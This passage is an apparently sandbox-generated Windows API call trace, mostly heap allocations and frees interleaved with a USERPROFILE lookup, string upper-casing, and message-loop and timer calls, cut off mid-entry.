RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0152.336] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0152.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0152.338] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.338] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0152.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0152.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0152.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0152.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0152.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0152.340] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0152.341] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0152.341] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0152.341] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0152.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0152.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0152.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0152.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0152.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0152.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0152.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0152.345] TranslateMessage (lpMsg=0x8cf708) returned 0 [0152.345] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0152.345] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0152.345] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0152.346] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0152.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0152.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0152.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0152.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0152.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0152.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0152.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.347] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0152.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0152.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0152.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0152.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0152.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0152.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0152.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 